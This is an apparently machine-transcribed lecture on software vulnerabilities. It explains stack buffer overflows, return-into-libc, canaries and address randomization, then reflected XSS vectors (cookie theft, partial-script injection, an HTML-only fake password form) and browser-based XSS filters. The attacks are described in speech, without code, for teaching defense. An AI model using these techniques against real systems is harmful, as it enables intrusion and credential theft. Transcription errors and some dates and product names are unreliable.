 Good morning everyone, welcome to session 2 of day 4. This talk today is about software vulnerabilities and web application security. So, I have combined these two things because they are closely related. So, something to think about whether we can ever design software that is reliable and secure. So, exploits that attacks the exploit software vulnerabilities some of these are you have seen a little bit of it or you will see them in the lab. We last time we talked about SQL injection, we also talked about cross side scripting briefly today we will complete that discussion and now we will also start talking about buffer overflow and there are some other attacks that are in the book format string attacks etcetera. You might want to ask yourself whether phishing attacks for example, could be caused due to software vulnerabilities. What about various worm and virus attacks are they directly a result of software that is not very well written. So, these are some of the questions to be thought about. We now proceed to talk about buffer overflow. So, let us see what this particular attack is. The buffer overflow vulnerability is one of the oldest and one of the most common. So, at least it used to be one of the most common there are others that are getting to be also important one of the most common of the software vulnerabilities. It traces back it is history to somewhere around 1988 when a student from Cornell university by the name of Morris. He actually created one of these things and he hacked into various systems of the university and in nearby places as well. So, the worm did spread because of basically a buffer overflow vulnerability. He was not really interested in causing much harm it was more like a proof of concept kind of thing, but this was the beginning of various worms that exploit the buffer overflow vulnerability. Since then there have been many some of the most well known are the code red worm which targeted the Microsoft IAS web server and then followed in 3 years later in 2004 by the slammer worm which actually wrote on UDP rather than on TCP. So, there are many different worms that are due to this buffer overflow vulnerability. So, many creative ways of converting this vulnerability into an exploit. I might just add that in security literature the word exploit is also used as a noun. So, in normal language we use exploit as a verb V E R B, but in security literature it is often the case that you find this word exploit is used as a noun. So, what are the different exploits that is what are the different attacks that are possible due to this vulnerability buffer overflow. So, what is exactly the problem? A buffer overflow occurs when the space allocated to a variable typically an array or a string variable in the C language in a C language program. This is insufficient to accommodate the variable in its entirety. So, you have defined a variable buffer for example, which is a character buffer let us say 100 characters long and then you try to populate it and you keep adding and adding to this buffer you keep populating it and the buffer overflows and it actually runs into some adjacent space in memory. For example, a certain amount of buffer space is allocated for an array. If the array bounds are not checked. So, it is only 100 characters that can fit into this array, but you do not check those bounds you keep writing into the 101st location 102nd location what happens first and foremost can you write into the 101st location 102nd location etcetera. The answer is in certain languages you can and one of those languages is C you cannot do this in java, but you can do this in C where you can overflow array bounds because there is no automatic array bound checking. So, array bounds are not checked while populating it the array may flow into contiguous memory and corrupt it interestingly this could cause an attacker to subvert the normal flow of a program. So, as I said before on day one think of not how things work, but think of how they may be made not to work. So, how can you subvert the normal flow of a program not writing a normal program, but a problem to subvert the normal operation of a program. This code supplied by the attacker in the buffer. So, the attacker could directly or indirectly be responsible for supplying some malicious code, which fits into this buffer and overflows it. Now, this is actually a subject that is close to computer science it requires certain understanding of these things. To understand buffer overflow we need to understand the virtual memory map of the machine. What are the different segments for example, the code segment, the data segment etcetera etcetera where do they lie, where is the stack for example, in all of this. Then we need to understand subroutine calling convention. So, in high level language programming we call them functions in assembly language we call them subroutines. So, how are subroutines called one say a main program calling a subroutine and a subroutine calling another subroutine etcetera etcetera. What exactly happens when one subroutine calls another what are the different things that happen and where does the responsibility lie. There are several things that need to be done some things are done by the calling program, some things are done by the hardware, some things are done by the called program, some things are done by the compiler and so on and so forth. So, subroutine calling convention and the organization of the program stack. So, what exactly is on the stack we need to know this very very precisely so that we can design our attack the important thing over here is precision. So, for that we need to look and see what a typical pair of subroutines how these things would appear on the stack what sort of variables would appear on the stack on behalf of each of these subroutines. So, look at the simple subroutine a which as you can see calls another subroutine b. So, subroutine a calls b and then returns it calls b with a single parameter which is an integer parameter. So, the number 5. So, as you can see over here subroutine b the input parameter the argument is an integer we call this k over here. And then there are certain automatic variables of so called local variables. So, the first one is buffer which is a character buffer which can store 100 characters and then an integer j which is equal to 3 plus k. And then there are other subroutines that that get called, but we are not so interested in them except for maybe this one get s buffer. So, basically what this is doing is it is populating this buffer based on whatever I type for example, on the screen whatever I type or on the from the keyboard whatever I type actually enters into this buffer. Now, the thing is that this particular function might be vulnerable in the sense that it does not care to see whether I have type 10 things or 100 things or 300 things it will simply overwrite and overwrite the whole thing. So, therein lies the vulnerability there is no array bounds checking I can overwrite the buffer and let us see what effect does this have if I overwrite the buffer. So, one important thing now we need to understand this pretty carefully the let us say the first subroutine will there will be some space on the stack allocated to a subroutine. So, the first subroutine imagine the first subroutine in the program there will be some space over here for example, then that thing calls another subroutine the stack grows in this direction. So, there will be another stack frame we call it a stack frame a stack frame allocated to this new program that has been called let us say and then that program calls program A as we had seen in the previous slide program A is the calling program now. So, stack space would be allocated for program A and then A calls B and now B gets allocated all the stack space. So, each of them get allocated a fair amount of space and there are certain things are very much in common between all these stack frames. So, this is known as the stack frame for subroutine or function B, B stack frame. So, since stacks so, if B called something else say B called a subroutine C then C stack frame would be on top of it and so on and so forth. Stack actually grows in this direction you keep adding things to it you keep pushing and pushing and pushing and then you keep popping out as and when it is required. And then the interesting thing is that while the stack grows in this direction as shown over here memory actually grows in the reverse direction. So, now imagine that a subroutine A is ready to call subroutine B. So, the first thing that should happen is and this is actually done by the subroutine itself is these parameters the calling parameters are actually first and foremost thrown on the stack. So, this is as part of A for example, again this can vary from compiler to compiler, but the argument that A uses to call B that is the first thing that gets pushed under the stack. So, let us again recall what was that argument here subroutine A that is calling subroutine B calling it with this parameter or with this argument. So, this is the first thing that is going to get pushed under the stack when this program this is a high level language program when it gets compiled into assembly one of the things that will happen is that these things these parameters will be pushed onto the stack. The next thing that needs to get pushed under the stack as you can imagine is the return address. So, when this thing is called I need to continue execution from there on from this point onwards. So, this thing is called this thing finishes it terminates I need to continue execution from this point onwards. Now, how does the computer know which is this address at which it should continue. So, that address has to be saved somewhere and that is one of the most important things to be saved on the stack and that is called the return address. So, as we can see now in this picture we have the calling parameter B's calling parameter called with this and then we have got the return address where you have to return after you finish executing subroutine B I have to continue with subroutine A. So, I continue at this point this is the return address and then there is something else that needs to be pushed onto the stack besides the return address and that is the saved frame pointer. So, recall that subroutine A was executing and subroutine A has something called a frame pointer which is typically stored in a register and all of subroutine A's local variables are referenced with respect to that frame pointer which has now been stored in a particular register. Now, as soon as I start with this the frame pointer for this new subroutine will be stored in that register. So, it will in a sense overwrite the frame pointer for subroutine A that is obviously not ok I need to saves the frame pointer for subroutine A and that is exactly what I do over here the save frame pointer for A has to be done. So, this is also typically done by the called program. So, this was done by the calling program calling subroutine this is typically done by the hardware the microprocessor hardware this is done by the called function and then we have certain local variables as you have seen before. So, those local variables are also pushed on to the stack. So, you push the parameter you push the return address you push the save frame pointer which this guy will use when he returns back and then you allocate space for these local variables in this particular case there are two local variables this and this. And of course, this may call this function may call some other functions like the printf is another function this is another function and so on there will be a build up of stack frames on the stack because of these. So, now let us see the space allocated to buffer and to J. So, this is buffer 100 bytes of space is allocated in general it is not that straight forward actually there is a certain amount of what is called alignment alignment and 4 byte boundaries and so on and so forth. So, this is these are the things the hacker should keep in mind exactly what is the organization over here is there any some space left out or because of alignment and so on and so forth which one is pushed first this or this where exactly is the return address with respect to this buffer and so on. So, the calling parameter the return address the save frame pointer and the two local variables now J and buffer. So, this is a summary of what I just said then a calls b the following are allocated or loaded on the stack the arguments or parameters used while calling b is return address the address at which a resumes on completion of b a copy of a is frame pointer do not forget that a is frame pointer was in a register. Now, all of a sudden I stop executing a and I start executing b. So, that frame pointer will be overwritten by b is frame pointer. So, I should save a is frame pointer in some place on the stack. So, that it can be reused by a when a resumes and finally, the local or automatic variables of b buffer is a is an array of 100 characters. So, 100 bytes have been reserved on the stack for b. Now, how do we exactly exploit this now that we understand exactly how the stack works and what is on the stack and so on and so forth how is a hacker expected to exploit this whole thing. So, what is what exactly happens is you provide input to a buffer on the stack. Now, this input could be from various sources, but directly or indirectly you can trace it back to the hacker the malicious input I mean. So, for example, you could have a web server that is accepting HTTP requests and the HTTP request is gets stored the values over here in the HTTP request the body gets stored on this particular stack for example, and it is actually stored in a buffer and that buffer is on the stack. So, provide input to a buffer. So, the attacker could provide input to this buffer on the stack and this input could include the malicious code and often this code is referred to as shell code. So, basically it is the attacker that is populating some buffer which may populate another buffer which in turn may populate this buffer that we are now talking about because these things can move from one buffer to the other. So, your provided input this input finally, comes from the attacker and then the interesting thing is that you have got let us say 100 bytes of space, but the actual input is much more. So, the buffer overflows and what happens when it overflows the return address to the calling program is overwritten with the address of the malicious code. So, let us again see what happens. So, the attacker has created some buffer has supplied input to this buffer that input that he supplied as I said before could be through an HTTP request message that might go initially from the outside world to some buffer and then that buffer might be transferred into this buffer. So, there is a lot of software over there to process HTTP requests and so on in the end that attacker data comes in over here. Now, as I said before memory grows in this direction and the stack grows in this direction this is a very important point. So, when I start to populate this buffer with the attackers data it starts from this point. So, it loads this loads this etcetera etcetera and then what happens is now he supplied more data than this can hold, but this get s function does not notice that does not do any array bounds checking. So, the buffer overflows and then it overwrites all of this and the thing that the attacker most wanted is to overwrite the return address. So, what is the point in overwriting the return address if you overwrite this you can very cleverly and carefully design the code such that this thing points to the address of the mal code the malicious code and incidentally he can put the malicious code or shell code as part of the buffer. So, he makes this thing point to the malicious code which is itself sitting down somewhere here. So, you have got malicious code that can take few tens of bytes and all of that could be part of this buffer that has that has now been populated. So, this return address points over there. So, the main point is when you actually finish executing of this particular sub routine then what the hardware will do is it will look at the return address and it will find that the return address is not what was actually put there before the return address in sub routine a, but rather the return address of the malicious code. So, when this particular program this function B terminates then what will happen is the malicious code will actually start to execute and that thing will do all sorts of things like opening up a shell getting a certain privileges and destroying certain files reading some sensitive data and so on and so forth. And if it is a virus or a worm one of the things it will do is it will start to try to spread. It will the worm code will actually be over here and the worm code for example, will establish a TCP connection with some other vulnerable machine it will look out to see what are the other vulnerable machines it will find one machine and it will try to infect it in exactly the same way this machine was infected. So, that is one of the number one ways in which you can actually design a worm by exploiting this vulnerability called buffer overflow. Now, it is not necessary. So, the first generation buffer overflow attacks had the malcode actually on the stack then a defense was thought of and the defense was basically make the stack non executable. So, if it is non executable then the malcode cannot execute then somebody came up with a second generation buffer overflow attack which is referred to as return into libc exploit. Here the malicious code is not placed on the stack instead this exploits makes a call to the C library function system with this parameter as below and the effect of this. So, I am not executing anything on the stack. So, there were two things that we did in the first attack in the first generation attack. The most important thing is we overwrote the return address and the second thing is we put the malicious code on the stack so that it executes think about this. Now, the thing to do is the defense was make the stack non executable. So, the stack is non executable even if I put the malicious code it is not going to execute. So, I have to think of something clever more clever and that something more clever is now do not point to code on the stack, but point to this system call and this call is actually it is actually a C library call which is called system with this parameter. So, I put this parameter in the right place I do all this designing. So, this is not exactly straight forward I have to do all this designing about where to put this parameter how this parameter came there and so on, but the important thing is the return address now points to this. So, the malware writer has knowledge of where this thing sits in virtual memory. So, the return address points to this and it takes this as parameter and. So, this thing executes and the effect of executing this particular C library function is to actually spawn a shell. So, now we as a shell he can send commands to your machine perhaps remotely and start reading your files writing your files deleting your files etcetera. So, this is the second generation buffer overflow attack referred to as return into lib C because it uses one of the C library functions namely this function. So, as usual when we talk about the attack we talk about the vulnerability the next thing is how do you defend against this attack. So, there are several kinds of defenses some at the operating system level some at the compiler level etcetera. So, one of the operating system level is making the stack non executable. So, this prevents malicious code on the stack from being executed. So, you try your first generation attack you override the return address you put the malware on the stack, but it will not execute because the stack has been made non executable. There are different segments in virtual memory there is the code segment, the stack segment, the data segment etcetera. So, you deliberately make that is the operating system makes the stack non executable. So, now this code will not will not actually execute. So, this was one of the earlier defenses you actually use multiple defenses in conjunction with each other. So, one defense is this. However, as we have seen attacks like the return into lib C are still possible despite this particular defense. Another defense which is very widely used today is a compiler based option which is placing a canary variable on the stack between the local variables and the return address. So, what is this why is it called canary? Basically this is we have talked about detection prevention and so on over here the canary actually detects that something is wrong. Let us see how that actually happens and why it is called canary is because the canary is a bird that people used to use in the past this bird is very sensitive to smell of smoke. So, in a mine if there is going to be an outbreak of a fire this thing can sense this canary can sense the smoke very early even though humans might not be able to sense it the canary senses it and starts making all sorts of noises and human beings get signaled that there is something that is going to happen something dangerous is going to happen and they all leave the mine and are saved. So, the canary is able this canary a bird is able to save them. So, in the same way this canary signals that a buffer overflow exploit is in progress. Let us see how this canary acts. So, once again this canary is a compiler based strategy. So, the canary might be placed somewhere between the return address and the local variables. Let us say it is placed between this and this. So, imagine a situation where the canary is placed between the return address and the save frame pointer. Now what happens is if you start to overflow this you will overflow the canary. So, what exactly happens is in the called function namely the called function is function B when B is called at the start of B's execution the compiler will insert code into the B function and that code will leave some space over here a canary variable like say a 4 byte thing and it will initialize it with some random the word random is very important with some random value. So, it will initialize this thing with some random value at the start of the subroutine call with subroutine subroutine B and then when subroutine B exits just before exiting it will check to see whether that canary value is maintained or not. So, the canary value sits between the return address for example, in the save frame pointer the code this code that has been injected by the compiler will check to see whether the canary value has been changed. Now you can see how this thing would work. Suppose this buffer were over flown it would overwrite all of this stuff the main goal is to overwrite the return address and in the process of overwriting all this before it comes to the return address it will overwrite the canary value. It does not know what is the canary value because it is a random value it will overwrite something in over there which in all likelihood would be different from the value inserted by the compiler. So, when the this subroutine terminates the compiler will check and see that something different has been inserted over there say over there in the canary value and then it will abort this program. It will detect an error and abort this execution because now this thing has been over flown. So, this is how the canary works once again this canary value there is a variable that is inserted between this and this the return address and the save frame pointer that value is initialized with a random number the word random is important. If the value is not random the hacker will know what is that value and he will very cleverly overflow this buffer. So, that value remains the same he will put the same value in the canary. So, that is what the compiler does at the start of execution of this function and then on termination what he will do is he will check whether that canary value has been is the same as what he initialized it to be and if it is it is safe and if it is not then the suspicion is that there is a buffer overflow. So, that is one of the best options available today and there are certain others like the randomization of address space I told you about virtual memory. So, if you can randomize the location of certain functions on this in memory then again that will confuse the hacker because he needs to know exactly where these different things are on the stack where these different addresses are on the exact address he needs to know. If you have randomized virtual memory then he will he will think of he will not be able to correctly determine the new address because of the randomization. So, that is yet another feature and we are going to actually demonstrate these things to you in tomorrow's class the effect of this defense this defense and the virtual space randomization defense. So, with that we more or less conclude our discussion of buffer overflow besides stack overflow there is another one called heap overflow. So, that is in the text we are not going to talk about it over here, but those who are interested might look at it there have been there has been at least another generation to this heap overflow attack. There are also format string attacks which you can try out and you can read and write into arbitrary memory locations because of this due to some vulnerability in the printf function. So, I would not discuss these in great detail, but something that those who are interested can look at the book and even implement something on them. So, with this I proceed now to conclude our discussion of cross side scripting. So, we will have one demo today on cross side scripting and in addition to that we have also talked about SQL injection we have had a demo on SQL injection before today's lab you will be doing SQL injection tomorrow's lab you will be doing cross side scripting both on DVWA damn vulnerable web application. So, let me now talk a little bit more about cross side scripting because it might have not been very clear I would like to get into some further details on this. So, the first thing is XSS what is it like in any attack the different things we would like to know are what is the attack what is happening in the attack can you give me the steps of this attack. So, let us say attack scenario once I know what is what is happening this is the attack the next question is why did the attack take place in the first place. So, what are the vulnerabilities and then the defenses. So, let us see if we can look at at least some of these things right now first and foremost what is the attack. So, here is me with my browser. So, this is my monitor here is the browser I have logged into one site let us call that site. So, this is the site I am logged into right now suddenly on another tab in my browser I get some email and that email has I may or may not be logged into the site I may be logged into many other sites, but I get an email which has a link to this. So, suddenly I get this email which has this I click on this and low and behold the browser actually. So, when I click on. So, here is the email and when I click on that link which link this link over here when I click on this link then a request an HTTP request is sent via the browser to that vulnerable site. So, the vulnerable website. So, this is the web server and then a response is generated and that response presumably does something malicious or bad. So, what is the bad thing it does etcetera, but before we get to that I was talking about reading this email and I saw this link which says claim your prize blah blah blah click on this link to claim your prize of 1 crore rupees and what is that link actually look like. So, it is something like this vulnerable dot com something the PHP application on it and then there is a question mark and then what the parameters of the HTTP get request. So, let us say part 1 is equal to something. So, this is typically what you might see for an HTTP request all the parameter values the parameter names and the parameter value something here and part 2 equals something. So, this is the exact scenario I was reading email I got this link my browser is open I was reading email in that email there was this malicious link I clicked on the link because I clicked on the link the browser generated a request to that particular website it happens to be a vulnerable website and there is an HTTP request and an HTTP response. Now, one important aspect the reason why this is vulnerable is again we should be very very clear about what are the attacks what are the vulnerabilities. The reason this is vulnerable is that it is simply reflected some of those parameters in particular these parameters for example, one of the one of both of them might have been reflected without any sanitization without any validation without any filtering. So, it is just reflects it and here is what the hacker does the hacker knows that this site is vulnerable. So, he designs his attack vector this is what we call the attack vector he designs the attack vector. So, that one or more of these parameters contains malicious code in particular malicious JavaScript what do we mean by malicious JavaScript we mean script that can for example, read your cookies and send them for example, to the attackers website those cookies might contain session information etcetera which I might then use to launch a CSRF attack cross side request forgery. So, the next thing we would like to see is what exactly could those attack vectors be and what could they do. So, there are several attack vectors some of them are JavaScript some of them are partial JavaScript some of them are pure HTML and so on. So, let us look at some of those attack vectors. So, parameter value is equal to just imagine that the hacker sent you the this particular link in the email and the web server is vulnerable. So, it actually reflects this thing. So, what happens is this script gets reflected back and executes it executes this is just JavaScript it gets reflected back without any sanitization it executes on your browser. Now, this does not look like a very dangerous script we can make it a little bit more dangerous instead of this parameter value we could put something like this. So, this script gets reflected back all that you will see is a pop up window and you will see high over there. If this script gets reflected back you will see the content of this cookie. So, this cookie will be actually displayed. Now, even so it does not look terrible as yet we can make it a little worse than this by shipping of the cookie to the attacker site. So, this is actually the attack vector all of this stuff this is the first attack vector this is my second attack vector I am not putting this w w w the same thing should be put in front of each of these things I am only putting the value after the equal to sign. So, if after the equal to sign I can put this you can try that out in the lab tomorrow or you can try putting this see what happens. Now, let us try to put this. So, now here is again JavaScript document dot location. So, I set the document dot location to guess what. So, this is actually the URL. So, the value of this parameter cookie will be document dot cookie. So, this is a plus here it is not looking very clear. So, I will just write it down again. So, I am closing this quote this is the opening quote ok. So, this is the opening quote and this is the closing quote for the URL and the value for parameter cookie is going to be. So, this is my third attack vector. Now, all of this what I am giving in every of these cases is complete script. Now, just to show you how very creative these accesses attack vectors are and how careful you have to be when you try to defend against them. It need not be the case that the attack vector is complete script as you can see over here what you find is complete script between the script tags. So, one defense you might think is to try to filter out these script tags from the input. Each of these three attack vectors begins and ends with a script tag this one to this one over here opening script tag closing script tag the third one opening script tag the closing script tag. As it turns out it is not necessary that you have a complete JavaScript statement or statements you can have a partial script kind of injection. Let us suppose the original web page it is entirely possible the original web page could contain. So, this is what is there in the original web page the static page. Now, what the application program will do is it will look at the HTTP request and it will pull out the value of the HTTP request parameter which I call par for parameter it will pull this value from the HTTP request and substitute it over here. So, imagine writing the web application with a bunch of PHP where you remove the parameter from the request and you simply substitute it over here and that parameter that was sent from the browser suppose it was something like this. So, notice this is only partial script this thing which is the HTTP request parameter is going to be inserted over there it is going to be substituted for this. So, you would have hello mister. So, just read the whole thing what is seen by the browser script alert hello mister x y z. Now, you this is the open parentheses this is closed by this finish the the JavaScript statement and begin a new statement alert document dot cookie which is then closed by this this was all there in the original web page. In the static web page all of this was there and now this is the parameter that has been put over here. So, now you can see what the browser will actually read script alert hello mister x y z close the parentheses finish the JavaScript statement begin the next statement alert document dot cookie open parentheses it closes the parentheses semicolon the JavaScript statement is completed and the end of the script. So, it will execute this whole thing which is not what was intended originally by the application it will actually execute something else the original application wanted script hello with an alert box hello mister x y z instead you get another pop-up box which shows the value of the cookie. So, the reason this is called partial script injection as you can very well see is that the attack vector is not a complete JavaScript statement, but it is actually a part of one statement and a part of another statement. So, we have talked about complete injection we have talked about partial injection you can also do without any JavaScript at all, but just with HTML alone. So, you can see the complexity of the problem the different kinds of XSS vectors that are possible. So, here is another attack vector which is believe it or not HTML only. So, there is no JavaScript as you will see now here is the attack vector. So, this is familiar to most people we are now writing a form over here. So, the attack vector contains only HTTP which includes a form the form action that is where the form parameters have to be sent is the attacker site. So, this is the entire attack vector what happens is this thing is sent as part of the URL which you have received in the email. This is the actual parameter of the URL this parameter was reflected back why because the website was vulnerable. It was reflected back it appears on your it is it is interpreted by your browser. The browser sees that this is all very familiar stuff which is basically opening a form creating a form. First and foremost it prints this message on the screen your session has expired please re-enter your password. Then it actually puts a form on the screen and the action field in the form tag is actually the attacker's website and what does this form do it asks you for your password. So, you type in your credential like a password and this thing is actually shipped out to the attacker site. So, we looked at some previous examples where the cookie was shipped out and this example your password has been shipped out. This is a combination of a phishing attack and a cross-site scripting attack. So, again a very very dangerous kind of attack the interesting thing is that it is not even including any any JavaScript, but it is purely HTML. So, I have given three examples now one is where you have an entire complete script JavaScript script the second is where you got a partial script and the third example is in HTML only attack vector. So, you will see all of these things in the lab today's lab and tomorrow's lab these special statements in PHP that were introduced to make your web application more secure. For example, special characters need to be identified and treated in a special way special tags need to be handled in a separate way and so on and so forth. So, now that we have talked about attack scenarios attack vectors the vulnerability in XSS the last thing is XSS defenses. So, there are two types of defenses that you can contemplate actually three types one is defenses on the client side defenses on the server side and then hybrid hybrid meaning a combination of both. So, this one has already been talked about and one thing is escaping or encoding in the case of SQL injection escaping in the case of XSS encoding of these special characters. So, the special characters in the case of XSS that is in JavaScript and HTML turn out to be things like this and if there are functions to encode these you might want to see what is the resulting output when these special characters. So, this is a special character as you can see the start of a tag this is special character the end of a JavaScript statement this is a special character in JavaScript which is the opening parentheses for functions and so on and so forth and the encoding of this is an ampersand less than for this one it is an ampersand and the number that is a hash sign number 59. So, what happens is that the server program will replace every semicolon occurrence with this thing. So, what happens as a result when this thing reaches the browser through the HTTP response this will lose its meaning its special meaning what was the special meaning of this in the context of JavaScript the end of a statement it will lose its special meaning this thing will lose its special meaning this thing would be encoded as ampersand number 40. So, if you look up at the internet do a Google search on these special characters you will see all these different encodings, but we need to encode only the special characters those that have special significance in the context of either HTML or JavaScript. So, this is one of the server side solutions encoding of special characters the other thing that he talked about another function was to figure out where a script occurs and replace and for example, just filter out these things. So, the different solutions are filtering encoding. So, when we talk about sanitization we mean these kinds of things filtering out these kinds of scripts that can create trouble is this sufficient. So, there was one function that he showed you where this script was replaced by a null character and you can defeat that defense because you could have something like this. So, he typed something like this on the text field and then what happened was the server function sanitize it using one of those statements, but it removed this thing it replaced this with a null character, but the rest of the script was remains. So, this thing removed you still have script out there. So, that sanitization is not enough the other sanitization is of course, escaping these characters. So, the typical methodology would be now let us go to a client side defense for example, the problem with the server side defense is it is not clear whether the web application programmer is security conscious to use all of these functions and sanitize everything. There are so many different ways in which these attacks can work I showed you before there was also one attack which did not involve you looked at all those attack vectors that I wrote on this on the board sometime ago on the screen sometime ago you will see that there was some without the script tag there were partial scripts and so on. So, just sanitizing and removing the script is not going to be effective in that case there were some that did not involve javascript only html. So, there are wide variety of attack vectors that are possible. So, if you look at the client side defenses which are now supported in all the major browsers take for example, IE or Chrome or Firefox there is an extension on low script. So, all of these have got substantial support for defending against XSS. So, the basic idea is something like this you have got the client or the browser on this side you have got the server on this side. So, one idea is the HTTP request that goes from here to here you look at all of the parameters and then when you see the response you try to match those parameters. So, there is parameter 1 parameter 2 etcetera you try to match those parameters inside the HTTP response and if you see the same parameters returning back that means there is some reflection and in those parameters if you see special characters like this or this or this then you encode them. So, this is one idea encoding the special characters in the HTTP response when you have seen a match not just any special character you will disable the entire page if you do that only the special characters that appeared in the HTTP request. So, only these special characters power 1 etcetera only these special characters that you find in power 1 and power 2 when you see them reflected back in the response. So, the basic idea of this defense client side defense is monitor the HTTP request identify the parameters save the parameters somewhere. Now, when the response comes in you look to see whether those parameters occur in the response. So, you do a matching string matching algorithm use a string matching algorithm to check for that and if those parameters. So, if those parameters do not contain special characters no problem, but if they do contain special problem special characters then encode them in the way I have just shown you before the HTML encoding what it is called with the ampersand and so on. So, that is one basic set of ideas and IE chrome and no script use them in some fashion some form or the other. To conclude our discussion of excesses defenses we would like to show a brief block diagram of what a browser looks like. So, these are some of the components of a browser. So, to start with you have the user interface. So, the JavaScript interpreter. So, these are some of the building blocks. So, let us see what each of these things is the user interface plus browser engine this takes actions performed by the user that is every action like a click or a drag or a drop etcetera and forwards them to the rendering engine. This thing contains the address bar the tool bar etcetera on your browser. So, this is a very basic kind of component the rendering engine is quite fancy. It basically parses the HTML document and create something called the document object model the DOM. So, it parses the HTML inside the document the HTTP response that it gets and creates the DOM. This network interface is responsible for sending out an HTTP request and receiving an HTTP response. So, this thing actually parses the document and whenever it sees any and renders the document and whenever it sees any JavaScript it sends it to the JavaScript interpreter to be executed. Now, what the Google Chrome browser has done is put an excesses filter between the rendering engine and the JavaScript interpreter. So, whenever you have any JavaScript that JavaScript. So, guess what this thing will do this is one excesses filter that is used in the case of Google Chrome. So, in what sense does it filter whenever this thing sees whatever JavaScript it sees over here it does a match with the HTTP request parameter. If there is a match then it will disable it because that means it is reflected excesses and it is probably malicious. So, it will actually disable the execution of that kind of JavaScript. Whatever JavaScript was that it sees going to this JavaScript interpreter which is matched with one of the HTTP input parameters. So, that is what Google Chrome will do. On the other hand internet explorer will actually put a filter at this point. It puts a filter at this point to match anything that is coming from the HTTP response with one of the parameters in the HTTP request and if it sees something like that it does not allow it to execute. So, these are two different ideas and you can actually compare them and see for the different attack vectors that I had shown which one will work for which attack vector. So, for example, if you have got an HTML only attack vector the last vector that I showed then putting the filter over here will not prevent that malicious HTML the malicious HTML that ask the user for credentials and so on that will still execute because that was pure HTML that attack vector. So, that did not get filtered out over here what goes from here to here is only JavaScript that was a pure HTML attack vector that did not get filtered out. So, that attack vector will succeed on Chrome for example, but then partial script injection might not succeed with this over here. So, there are so many different attack vectors and coming up with the best kind of defense for XSS is actually a challenge. So, what we have done over here is to design defense we call X Buster which is an extension to the Firefox browser which actually has a filter both of these points and uses a very interesting filtering algorithm. It basically takes the HTTP request parameters takes each one of them and it splits it up into HTML context and JavaScript context and stores them and then when it sees the response coming in it does a match at this point it does a match it looks at the entire web page and if there is any match between any of the HTML context it will encode those string and if it sees a match between what is going. So, that is one place the filter is used there is another part of the filter at this point whenever it sees anything going into the JavaScript interpreter and if there is a match between one of the JavaScript contexts then it will encode the special characters in that. So, that it is disabled and it won't execute. So, that is basically the idea because there are so many different attack vectors it is so complicated some of them are HTML only some of them are partial script injection some are multi point injection and so on and so forth you have to be very careful if you are trying to get rid of all possible XSS attacks. So, we will have this put on the web at some point the paper is being written currently it is done by some of the students who have graduated and some who graduated 2 years ago and some who graduated recently and we will put it as one of the technical reports very soon. So, with that I conclude this discussion of XSS we started with XSS attack scenarios and XSS attack vectors we looked at the vulnerabilities behind XSS basically this business of not sanitizing things and just reflecting user input and then we looked at defenses which are defenses possibly on the server side that lucky showed you those particular statements in the dvwa security level 0 and security level 1 and then defenses on the client side which we have also been involved with defenses that exist with the on the chrome browser and on the Microsoft internet explorer browser and some of the defenses that we ourselves have created over here. So, thank you for listening.